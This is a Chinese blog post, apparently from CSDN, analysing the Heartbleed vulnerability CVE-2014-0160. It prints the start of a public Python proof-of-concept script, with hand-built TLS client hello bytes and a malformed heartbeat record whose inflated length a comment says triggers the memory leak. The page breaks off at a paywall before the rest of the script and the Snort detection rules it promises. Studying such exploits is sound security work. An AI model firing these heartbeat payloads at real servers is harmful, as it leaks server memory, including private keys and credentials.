【漏洞分析】Heartbleed 2014-0160漏洞Poc及规则分析

最新推荐文章于 2024-07-22 15:46:30 发布

Walter_Jia

最新推荐文章于 2024-07-22 15:46:30 发布

阅读量3k

点赞数

分类专栏： Network Security 文章标签：漏洞

本文链接：https://blog.csdn.net/jiayanhui2877/article/details/47298343

版权

本文详细探讨了Heartbleed（CVE-2014-0160）漏洞，通过Poc脚本展示了如何利用漏洞进行信息获取。脚本包括两种方法：一是先发送client hello，接收server hello后再发送心跳并解析数据；二是直接在client hello中携带心跳消息，分析服务器响应。同时，提供了Snort检测规则以防范此类漏洞。

摘要由CSDN通过智能技术生成

HeartBleed Poc脚本
1、发送client hello接收serverhello 之后发送心跳再解析获取的数据信息
2、发送client hello时直接带上心跳消息，然后解析服务器返回信息

#!/usr/bin/python
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# Modified by Derek Callaway (decal@ethernet.org) to add STARTTLS protocols
# The authors disclaim copyright to this source code.


import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser

class par:
    port = 443
    starttls = "hi"


options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
options.add_option('-s', '--starttls', type='string', default='', help='STARTTLS protocol: smtp, pop3, imap, ftp, or xmpp')


def h2bin(x):
    return x.replace(' ', '').replace('\n', '').decode('hex')


hello = h2bin('''
16 03 02 00  dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
00 0f 00 01 01
''')

hello2 = h2bin('''
16 03 02 00 6c 01 00 00 
68 03 01 55 80 a3 2d 12 
d8 d2 07 ab 90 86 b4 3d 
b6 f2 bd 7b 87 ea e9 cb 
db ad c3 84 b0 fa 67 0f 
3c de 59 09 a6 44 b7 5c 
de 58 1f 67 26 00 38 00 
10 00 0c 00 09 00 07 00 
14 00 05 00 0e 00 08 00 
04 00 0d 00 00 00 15 00 
01 00 03 00 0b 00 11 00 
12 00 18 00 1a 00 06 00 
0a 00 13 00 17 00 16 00 
0f 00 02 00 1b 00 19 01 
00 18 03 02 00 6f 01 44 
21 09 8d 7c 6f b8 a2 26 
e3 c7 30 27 aa a5 a4 c2 
fe 59 16 48 a7 15 3d a2 
f8 8a 4c a5 6c a4 ae 42 
4a 34 26 da e1 7d cd 30 
c0 d5 a7 89 f4 d0 de 01 
1e 79 23 02 09 67 f2 5d 
7c ba ad a8 c4 5b 7a 90 
7f bb 0c 09 10 1d 3f 28 
63 77 98 cf 0c a1 be 04 
00 2e fe fc af 57 6e e9 
c8 fa c8 03 22 b4 44 e9 
20 da d1 bb b2 3d f8 fa 
42 9a a5 8b 81

''')
#04 21 is len
#0800 can triger the vulnerability max value4000
hb = h2bin('''
18 03 02 00 03
01 08 00
''')



def hexdump(s):

最低0.47元/天解锁文章

Walter_Jia

关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
【漏洞分析】Heartbleed 2014-0160漏洞Poc及规则分析

HeartBleed Poc脚本 1、发送client hello接收serverhello 之后发送心跳再解析获取的数据信息 2、发送client hello时直接带上心跳消息，然后解析服务器返回信息#!/usr/bin/python# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@js
复制链接

扫一扫

专栏目录